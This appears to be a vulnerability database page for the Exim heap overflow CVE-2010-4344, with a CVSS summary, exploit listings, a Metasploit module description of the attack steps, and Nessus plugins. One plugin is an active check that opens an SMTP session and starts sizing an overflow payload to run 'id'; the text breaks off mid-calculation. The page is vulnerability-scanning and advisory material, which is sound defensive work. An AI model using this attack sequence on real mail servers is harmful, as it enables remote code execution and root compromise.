Vulnerabilities > CVE-2010-4344 - Out-of-bounds Write vulnerability in multiple products

047910
CVSS 9.8 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
HIGH
Integrity impact
HIGH
Availability impact
HIGH
network
low complexity
exim
opensuse
debian
canonical
CWE-787
critical
nessus
exploit available
metasploit

Summary

Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.

Common Weakness Enumeration (CWE)

Exploit-Db

  • descriptionExim4. CVE-2010-4344,CVE-2010-4345. Remote exploit for linux platform
    idEDB-ID:16925
    last seen2016-02-02
    modified2010-12-16
    published2010-12-16
    reportermetasploit
    sourcehttps://www.exploit-db.com/download/16925/
    titleExim4 <= 4.69 - string_format Function Heap Buffer Overflow
  • descriptionExim 4.63 - Remote Root Exploit. CVE-2010-4344. Remote exploit for linux platform
    idEDB-ID:15725
    last seen2016-02-01
    modified2010-12-11
    published2010-12-11
    reporterkingcope
    sourcehttps://www.exploit-db.com/download/15725/
    titleExim 4.63 - Remote Root Exploit

Metasploit

descriptionThis module exploits a heap buffer overflow within versions of Exim prior to version 4.69. By sending a specially crafted message, an attacker can corrupt the heap and execute arbitrary code with the privileges of the Exim daemon. The root cause is that no check is made to ensure that the buffer is not full prior to handling '%s' format specifiers within the 'string_vformat' function. In order to trigger this issue, we get our message rejected by sending a message that is too large. This will call into log_write to log rejection headers (which is a default configuration setting). After filling the buffer, a long header string is sent. In a successful attempt, it overwrites the ACL for the 'MAIL FROM' command. By sending a second message, the string we sent will be evaluated with 'expand_string' and arbitrary shell commands can be executed. It is likely that this issue could also be exploited using other techniques such as targeting in-band heap management structures, or perhaps even function pointers stored in the heap. However, these techniques would likely be far more platform specific, more complicated, and less reliable. This bug was original found and reported in December 2008, but was not properly handled as a security issue. Therefore, there was a 2 year lag time between when the issue was fixed and when it was discovered being exploited in the wild. At that point, the issue was assigned a CVE and began being addressed by downstream vendors. An additional vulnerability, CVE-2010-4345, was also used in the attack that led to the discovery of danger of this bug. This bug allows a local user to gain root privileges from the Exim user account. If the Perl interpreter is found on the remote system, this module will automatically exploit the secondary bug as well to get root.
idMSF:EXPLOIT/UNIX/SMTP/EXIM4_STRING_FORMAT
last seen2020-01-17
modified2018-09-15
published2010-12-11
references
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/smtp/exim4_string_format.rb
titleExim4 string_format Function Heap Buffer Overflow

Nessus

  • NASL familyOracle Linux Local Security Checks
    NASL idORACLELINUX_ELSA-2010-0970.NASL
    descriptionFrom Red Hat Security Advisory 2010:0970 : Updated exim packages that fix one security issue are now available for Red Hat Enterprise Linux 4 and 5, and Red Hat Enterprise Linux 4.7, 5.3, and 5.4 Extended Update Support. The Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. Exim is a mail transport agent (MTA) developed at the University of Cambridge for use on Unix systems connected to the Internet. A buffer overflow flaw was discovered in Exim
    last seen2020-06-01
    modified2020-06-02
    plugin id68160
    published2013-07-12
    reporterThis script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/68160
    titleOracle Linux 4 / 5 : exim (ELSA-2010-0970)
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were
    # extracted from Red Hat Security Advisory RHSA-2010:0970 and 
    # Oracle Linux Security Advisory ELSA-2010-0970 respectively.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(68160);
      script_version("1.10");
      script_cvs_date("Date: 2019/10/25 13:36:09");
    
      script_cve_id("CVE-2010-4344");
      script_bugtraq_id(45308);
      script_xref(name:"RHSA", value:"2010:0970");
    
      script_name(english:"Oracle Linux 4 / 5 : exim (ELSA-2010-0970)");
      script_summary(english:"Checks rpm output for the updated packages");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Oracle Linux host is missing one or more security updates."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "From Red Hat Security Advisory 2010:0970 :
    
    Updated exim packages that fix one security issue are now available
    for Red Hat Enterprise Linux 4 and 5, and Red Hat Enterprise Linux
    4.7, 5.3, and 5.4 Extended Update Support.
    
    The Red Hat Security Response Team has rated this update as having
    critical security impact. A Common Vulnerability Scoring System (CVSS)
    base score, which gives a detailed severity rating, is available from
    the CVE link in the References section.
    
    Exim is a mail transport agent (MTA) developed at the University of
    Cambridge for use on Unix systems connected to the Internet.
    
    A buffer overflow flaw was discovered in Exim's internal
    string_vformat() function. A remote attacker could use this flaw to
    execute arbitrary code on the mail server running Exim.
    (CVE-2010-4344)
    
    Note: successful exploitation would allow a remote attacker to execute
    arbitrary code as root on a Red Hat Enterprise Linux 4 or 5 system
    that is running the Exim mail server. An exploit for this issue is
    known to exist.
    
    For additional information regarding this flaw, along with mitigation
    advice, please see the Knowledge Base article linked to in the
    References section of this advisory.
    
    Users of Exim are advised to update to these erratum packages which
    contain a backported patch to correct this issue. After installing
    this update, the Exim daemon will be restarted automatically."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://oss.oracle.com/pipermail/el-errata/2010-December/001767.html"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://oss.oracle.com/pipermail/el-errata/2010-December/001768.html"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected exim packages.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'Exim4 string_format Function Heap Buffer Overflow');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
      script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
      script_set_attribute(attribute:"canvas_package", value:'CANVAS');
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:exim");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:exim-doc");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:exim-mon");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:exim-sa");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:linux:4");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:linux:5");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2010/12/14");
      script_set_attribute(attribute:"patch_publication_date", value:"2010/12/11");
      script_set_attribute(attribute:"plugin_publication_date", value:"2013/07/12");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Oracle Linux Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/OracleLinux", "Host/RedHat/release", "Host/RedHat/rpm-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/OracleLinux")) audit(AUDIT_OS_NOT, "Oracle Linux");
    release = get_kb_item("Host/RedHat/release");
    if (isnull(release) || !pregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux)", string:release)) audit(AUDIT_OS_NOT, "Oracle Linux");
    os_ver = pregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\.[0-9]+)?)", string:release);
    if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Oracle Linux");
    os_ver = os_ver[1];
    if (! preg(pattern:"^(4|5)([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Oracle Linux 4 / 5", "Oracle Linux " + os_ver);
    
    if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && "ia64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Oracle Linux", cpu);
    
    flag = 0;
    if (rpm_check(release:"EL4", reference:"exim-4.43-1.RHEL4.5.el4_8.1")) flag++;
    if (rpm_check(release:"EL4", reference:"exim-doc-4.43-1.RHEL4.5.el4_8.1")) flag++;
    if (rpm_check(release:"EL4", reference:"exim-mon-4.43-1.RHEL4.5.el4_8.1")) flag++;
    if (rpm_check(release:"EL4", reference:"exim-sa-4.43-1.RHEL4.5.el4_8.1")) flag++;
    
    if (rpm_check(release:"EL5", reference:"exim-4.63-5.el5_5.2")) flag++;
    if (rpm_check(release:"EL5", reference:"exim-mon-4.63-5.el5_5.2")) flag++;
    if (rpm_check(release:"EL5", reference:"exim-sa-4.63-5.el5_5.2")) flag++;
    
    
    if (flag)
    {
      if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
      else security_hole(0);
      exit(0);
    }
    else
    {
      tested = pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "exim / exim-doc / exim-mon / exim-sa");
    }
    
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2010-0970.NASL
    descriptionUpdated exim packages that fix one security issue are now available for Red Hat Enterprise Linux 4 and 5, and Red Hat Enterprise Linux 4.7, 5.3, and 5.4 Extended Update Support. The Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. Exim is a mail transport agent (MTA) developed at the University of Cambridge for use on Unix systems connected to the Internet. A buffer overflow flaw was discovered in Exim
    last seen2020-06-01
    modified2020-06-02
    plugin id51133
    published2010-12-12
    reporterThis script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/51133
    titleRHEL 4 / 5 : exim (RHSA-2010:0970)
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Red Hat Security Advisory RHSA-2010:0970. The text 
    # itself is copyright (C) Red Hat, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(51133);
      script_version ("1.26");
      script_cvs_date("Date: 2019/10/25 13:36:15");
    
      script_cve_id("CVE-2010-4344");
      script_bugtraq_id(45308);
      script_xref(name:"RHSA", value:"2010:0970");
    
      script_name(english:"RHEL 4 / 5 : exim (RHSA-2010:0970)");
      script_summary(english:"Checks the rpm output for the updated packages");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Red Hat host is missing one or more security updates."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "Updated exim packages that fix one security issue are now available
    for Red Hat Enterprise Linux 4 and 5, and Red Hat Enterprise Linux
    4.7, 5.3, and 5.4 Extended Update Support.
    
    The Red Hat Security Response Team has rated this update as having
    critical security impact. A Common Vulnerability Scoring System (CVSS)
    base score, which gives a detailed severity rating, is available from
    the CVE link in the References section.
    
    Exim is a mail transport agent (MTA) developed at the University of
    Cambridge for use on Unix systems connected to the Internet.
    
    A buffer overflow flaw was discovered in Exim's internal
    string_vformat() function. A remote attacker could use this flaw to
    execute arbitrary code on the mail server running Exim.
    (CVE-2010-4344)
    
    Note: successful exploitation would allow a remote attacker to execute
    arbitrary code as root on a Red Hat Enterprise Linux 4 or 5 system
    that is running the Exim mail server. An exploit for this issue is
    known to exist.
    
    For additional information regarding this flaw, along with mitigation
    advice, please see the Knowledge Base article linked to in the
    References section of this advisory.
    
    Users of Exim are advised to update to these erratum packages which
    contain a backported patch to correct this issue. After installing
    this update, the Exim daemon will be restarted automatically."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2010-4344"
      );
      # https://access.redhat.com/kb/docs/DOC-43789
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/articles/43788"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/errata/RHSA-2010:0970"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected packages.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'Exim4 string_format Function Heap Buffer Overflow');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
      script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
      script_set_attribute(attribute:"canvas_package", value:'CANVAS');
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:exim");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:exim-doc");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:exim-mon");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:exim-sa");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:4");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:4.7");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:4.8");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:5");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:5.3");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:5.4");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2010/12/14");
      script_set_attribute(attribute:"patch_publication_date", value:"2010/12/10");
      script_set_attribute(attribute:"plugin_publication_date", value:"2010/12/12");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Red Hat Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("rpm.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/RedHat/release");
    if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat");
    os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release);
    if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
    os_ver = os_ver[1];
    if (! preg(pattern:"^(4|5)([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 4.x / 5.x", "Red Hat " + os_ver);
    
    if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu);
    
    yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo");
    if (!empty_or_null(yum_updateinfo)) 
    {
      rhsa = "RHSA-2010:0970";
      yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);
      if (!empty_or_null(yum_report))
      {
        security_report_v4(
          port       : 0,
          severity   : SECURITY_HOLE,
          extra      : yum_report 
        );
        exit(0);
      }
      else
      {
        audit_message = "affected by Red Hat security advisory " + rhsa;
        audit(AUDIT_OS_NOT, audit_message);
      }
    }
    else
    {  sp = get_kb_item("Host/RedHat/minor_release");
      if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
    
      flag = 0;
    if (sp == "7") {   if (rpm_check(release:"RHEL4", sp:"7", reference:"exim-4.43-1.RHEL4.5.el4_7.1")) flag++; }
      else { if (rpm_check(release:"RHEL4", reference:"exim-4.43-1.RHEL4.5.el4_8.1")) flag++; }
    
    if (sp == "7") {   if (rpm_check(release:"RHEL4", sp:"7", reference:"exim-doc-4.43-1.RHEL4.5.el4_7.1")) flag++; }
      else { if (rpm_check(release:"RHEL4", reference:"exim-doc-4.43-1.RHEL4.5.el4_8.1")) flag++; }
    
    if (sp == "7") {   if (rpm_check(release:"RHEL4", sp:"7", reference:"exim-mon-4.43-1.RHEL4.5.el4_7.1")) flag++; }
      else { if (rpm_check(release:"RHEL4", reference:"exim-mon-4.43-1.RHEL4.5.el4_8.1")) flag++; }
    
    if (sp == "7") {   if (rpm_check(release:"RHEL4", sp:"7", reference:"exim-sa-4.43-1.RHEL4.5.el4_7.1")) flag++; }
      else { if (rpm_check(release:"RHEL4", reference:"exim-sa-4.43-1.RHEL4.5.el4_8.1")) flag++; }
    
    
    if (sp == "4") {   if (rpm_check(release:"RHEL5", sp:"4", cpu:"i386", reference:"exim-4.63-3.el5_4.1")) flag++; }
    else if (sp == "3") {   if (rpm_check(release:"RHEL5", sp:"3", cpu:"i386", reference:"exim-4.63-3.el5_3.1")) flag++; }
      else { if (rpm_check(release:"RHEL5", cpu:"i386", reference:"exim-4.63-5.el5_5.2")) flag++; }
    
    if (sp == "4") {   if (rpm_check(release:"RHEL5", sp:"4", cpu:"s390x", reference:"exim-4.63-3.el5_4.1")) flag++; }
    else if (sp == "3") {   if (rpm_check(release:"RHEL5", sp:"3", cpu:"s390x", reference:"exim-4.63-3.el5_3.1")) flag++; }
      else { if (rpm_check(release:"RHEL5", cpu:"s390x", reference:"exim-4.63-5.el5_5.2")) flag++; }
    
    if (sp == "4") {   if (rpm_check(release:"RHEL5", sp:"4", cpu:"x86_64", reference:"exim-4.63-3.el5_4.1")) flag++; }
    else if (sp == "3") {   if (rpm_check(release:"RHEL5", sp:"3", cpu:"x86_64", reference:"exim-4.63-3.el5_3.1")) flag++; }
      else { if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"exim-4.63-5.el5_5.2")) flag++; }
    
    if (sp == "4") {   if (rpm_check(release:"RHEL5", sp:"4", cpu:"i386", reference:"exim-mon-4.63-3.el5_4.1")) flag++; }
    else if (sp == "3") {   if (rpm_check(release:"RHEL5", sp:"3", cpu:"i386", reference:"exim-mon-4.63-3.el5_3.1")) flag++; }
      else { if (rpm_check(release:"RHEL5", cpu:"i386", reference:"exim-mon-4.63-5.el5_5.2")) flag++; }
    
    if (sp == "4") {   if (rpm_check(release:"RHEL5", sp:"4", cpu:"s390x", reference:"exim-mon-4.63-3.el5_4.1")) flag++; }
    else if (sp == "3") {   if (rpm_check(release:"RHEL5", sp:"3", cpu:"s390x", reference:"exim-mon-4.63-3.el5_3.1")) flag++; }
      else { if (rpm_check(release:"RHEL5", cpu:"s390x", reference:"exim-mon-4.63-5.el5_5.2")) flag++; }
    
    if (sp == "4") {   if (rpm_check(release:"RHEL5", sp:"4", cpu:"x86_64", reference:"exim-mon-4.63-3.el5_4.1")) flag++; }
    else if (sp == "3") {   if (rpm_check(release:"RHEL5", sp:"3", cpu:"x86_64", reference:"exim-mon-4.63-3.el5_3.1")) flag++; }
      else { if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"exim-mon-4.63-5.el5_5.2")) flag++; }
    
    if (sp == "4") {   if (rpm_check(release:"RHEL5", sp:"4", cpu:"i386", reference:"exim-sa-4.63-3.el5_4.1")) flag++; }
    else if (sp == "3") {   if (rpm_check(release:"RHEL5", sp:"3", cpu:"i386", reference:"exim-sa-4.63-3.el5_3.1")) flag++; }
      else { if (rpm_check(release:"RHEL5", cpu:"i386", reference:"exim-sa-4.63-5.el5_5.2")) flag++; }
    
    if (sp == "4") {   if (rpm_check(release:"RHEL5", sp:"4", cpu:"s390x", reference:"exim-sa-4.63-3.el5_4.1")) flag++; }
    else if (sp == "3") {   if (rpm_check(release:"RHEL5", sp:"3", cpu:"s390x", reference:"exim-sa-4.63-3.el5_3.1")) flag++; }
      else { if (rpm_check(release:"RHEL5", cpu:"s390x", reference:"exim-sa-4.63-5.el5_5.2")) flag++; }
    
    if (sp == "4") {   if (rpm_check(release:"RHEL5", sp:"4", cpu:"x86_64", reference:"exim-sa-4.63-3.el5_4.1")) flag++; }
    else if (sp == "3") {   if (rpm_check(release:"RHEL5", sp:"3", cpu:"x86_64", reference:"exim-sa-4.63-3.el5_3.1")) flag++; }
      else { if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"exim-sa-4.63-5.el5_5.2")) flag++; }
    
    
      if (flag)
      {
        security_report_v4(
          port       : 0,
          severity   : SECURITY_HOLE,
          extra      : rpm_report_get() + redhat_report_package_caveat()
        );
        exit(0);
      }
      else
      {
        tested = pkg_tests_get();
        if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
        else audit(AUDIT_PACKAGE_NOT_INSTALLED, "exim / exim-doc / exim-mon / exim-sa");
      }
    }
    
  • NASL familySMTP problems
    NASL idEXIM_STRING_VFORMAT.NASL
    descriptionA heap overflow vulnerability exists in the version of exim installed on the remote host. By sending a specially crafted message to the server, a remote attacker can leverage this vulnerability to execute arbitrary code on the server with the privilege of the exim server. A separate vulnerability that Nessus didn
    last seen2020-06-01
    modified2020-06-02
    plugin id51179
    published2010-12-15
    reporterThis script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/51179
    titleExim string_format Function Remote Overflow
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(51179);
      script_version("1.17");
      script_cvs_date("Date: 2018/11/15 20:50:24");
    
      script_cve_id("CVE-2010-4344");
      script_bugtraq_id(45308);
    
      script_name(english:"Exim string_format Function Remote Overflow");
      script_summary(english:"Tries to run a command.");
    
      script_set_attribute(
        attribute:"synopsis",
        value:"The remote service has a buffer overflow."
      );
      script_set_attribute(
        attribute:"description",
        value:
    "A heap overflow vulnerability exists in the version of exim
    installed on the remote host. 
    
    By sending a specially crafted message to the server, a remote
    attacker can leverage this vulnerability to execute arbitrary code on
    the server with the privilege of the exim server. A separate vulnerability
    that Nessus didn't test for, CVE-2010-4345, is often used to elevate the
    exim user to root access. 
    
    Note that Nessus checked for this vulnerability by sending a specially
    crafted packet and checking the response, without crashing the
    service. 
    
    All 4.6x versions 4.69-9 and below are known to be affected, and others
    may be as well."
      );
    
      script_set_attribute(
        attribute:"solution",
        value:"Upgrade to version 4.70 as it addresses the issue."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'Exim4 string_format Function Heap Buffer Overflow');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
      script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
      script_set_attribute(attribute:"canvas_package", value:'CANVAS');
    
      script_set_attribute(attribute:"see_also", value:"https://bugs.exim.org/show_bug.cgi?id=787" );
      script_set_attribute(attribute:"see_also", value:"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=606612" );
      script_set_attribute(attribute:"see_also", value:"https://lists.exim.org/lurker/message/20101207.215955.bb32d4f2.en.html" );
    script_set_attribute(attribute:"vuln_publication_date", value:"2010/12/10");
      script_set_attribute(attribute:"patch_publication_date", value:"2008/12/08");
      script_set_attribute(attribute:"plugin_publication_date", value:"2010/12/15");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:exim:exim");
      script_set_attribute(attribute:"exploited_by_nessus", value:"true");
      script_end_attributes();
    
      script_category(ACT_ATTACK);
      script_family(english:"SMTP problems");
      script_copyright(english:"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencie("smtpserver_detect.nasl");
      script_require_ports("Services/smtp", 25);
    
      exit(0);
    }
    
    include("global_settings.inc");
    include("misc_func.inc");
    include("smtp_func.inc");
    include("data_protection.inc");
    
    # Get the SMTP port
    port = get_service(svc:"smtp", default:25, exit_on_fail:TRUE);
    if (!get_port_state(port)) exit(0, "Port "+port+" is not open.");
    
    
    # Get the banner from the registry (so we can bail early if it isn't a vulnerable version)
    banner = get_smtp_banner(port:port);
    if (!banner) exit(1, "The mail server listening on port "+port+" didn't respond.");
    if ("Exim" >!< banner) exit(1, "The mail server listening on port "+port+" does not appear to be Exim.");
    
    # Make sure the version of exim is 4.6x - other versions aren't vulnerable
    banner = eregmatch(pattern:"^220 .*(Exim [0-9]+\.[0-9]+)", string:banner);
    if (!banner) exit(1, "The Exim install listening on port "+port+" returned an unexpected response to EHLO.");
    if ('4.6' >!< banner[1]) exit(1, "The Exim install listening on port "+port+" doesn't look like a vulnerable version.");
    
    
    # Set up some variables
    from = smtp_from_header();
    
    to = get_kb_item("SMTP/headers/To");
    if (!to) to = 'root@localhost';
    
    # The user@ portion of the from/to headers (required for length checking)
    from_user = eregmatch(pattern:"^(.*)@(.*)$", string:from);
    from_user = from_user[1];
    
    to_user = eregmatch(pattern:"^(.*)@(.*)$", string:from);
    to_user = to_user[1];
    
    if (!from_user) exit(1, "'from' email address was in an invalid format: " + from);
    
    if(!to_user) exit(1, "'to' email address was in an invalid format: " + from);
    
    # Hostname and ip should be filled in after the EHLO
    hostname = 'nessus';
    ip = "xxx.xxx.x.xxx";
    
    # Initialize the overflow size to 50mb (this should be filled in later)
    max_size = 50 * 1024 * 1024;
    
    # The command to run when we get access, and how to match it
    command = 'id';
    command_match = 'uid=';
    
    # Open the socket
    socket = open_sock_tcp(port);
    if (!socket) exit(1, "Can't open socket on port "+port+".");
    
    # Receive the first line
    header = recv_line( socket:socket, length:1024);
    if(!header) exit(1, "The Exim install listening on port "+port+" didn't respond.");
    
    # Send the EHLO
    request = 'EHLO ' + hostname + '\r\n';
    send(socket:socket, data:request);
    
    # Parse the options (we're interested in SIZE, which tells us how big we have to go to generate an error)
    while(TRUE)
    {
      # Get the next options line
      options = recv_line( socket:socket, length:1024);
    
      # Parse it to make sure it's not an error
      options = eregmatch(pattern:"^250([ -])(.*)", string:options);
      if(!options)
        exit(0, "Server on port "+port+" returned an unexpected result");
    
      # In the 'hello' response, parse out the hostname/ip address
      # 250-debian Hello domain.com [192.168.103.1]
      if("Hello" >< options[2])
      {
        options = eregmatch(pattern:"Hello ([^ ]+) \[([0-9.]+)\]", string:options[2]);
        if(!options)
          exit(1, "Server returned an unexected 'Hello' string");
        hostname = options[1];
        ip = options[2];
      }
    
      # Parse the 'size' - this tells us how much we need to overflow the buffer
      # 250-SIZE 52428800
      if("SIZE" >< options[2])
      {
        new_size = eregmatch(pattern:'SIZE ([0-9]*)', string:options[2]);
        if(new_size)
          max_size = int(new_size[1]);
      }
    
      # Check if we're at the end of the options array
      if(options[1] == ' ')
        break;
    }
    
    # Send the MAIL FROM and check for errors
    request = 'MAIL FROM: ' + from + '\r\n';
    send(socket:socket, data:request);
    response = recv_line( socket:socket, length:1024);
    if('250' >!< response)
      exit(1, "The Exim install listening on port "+port+" returned an unexpected result to MAIL FROM (" + response + ").");
    
    # Send the RCPT TO (also using Metasploit's default)
    request = 'RCPT TO: ' + to + '\r\n';
    send(socket:socket, data:request);
    response = recv_line( socket:socket, length:1024);
    if('250' >!< response)
      exit(1, "The Exim install listening on port "+port+" returned an unexpected result to RCPT TO (" + response + ").");
    
    # Send the DATA
    request = 'DATA\r\n';
    send(socket:socket, data:request);
    response = recv_line( socket:socket, length:1024);
    if('354' >!< response)
      exit(1, "The Exim install listening on port "+port+" returned an unexpected result to DATA (" + response + ").");
    
    # Finally, we have to overflow the buffer exactly right, so there are 3 bytes left.  The
    # exploit is in a sprintf()-style function called string_vformat(). If the length string
    # passed to string_vformat() is exactly the same as the number of characters in the string,
    # the overflow happens. That's normally difficult to accomplish, but Exim's logging for failed
    # connection gives exactly that opportunity. 
    #
    # The buffer starts at 8192 bytes. Each line it prints shortens the buffer by that much. 
    buffer_size = 8192;
    
    # The date is prefixed to the log
    buffer_size = buffer_size - strlen("2010-12-13 15:46:12 ");
    
    # As is the message ID
    buffer_size = buffer_size - strlen("1PSF66-0000nX-9z ");
    
    # Different configurations use a different string here.. this is what the default on Slackware is:
    #rejected from <root@localhost> U=root: message too big: read=56725188 max=52428800
    #
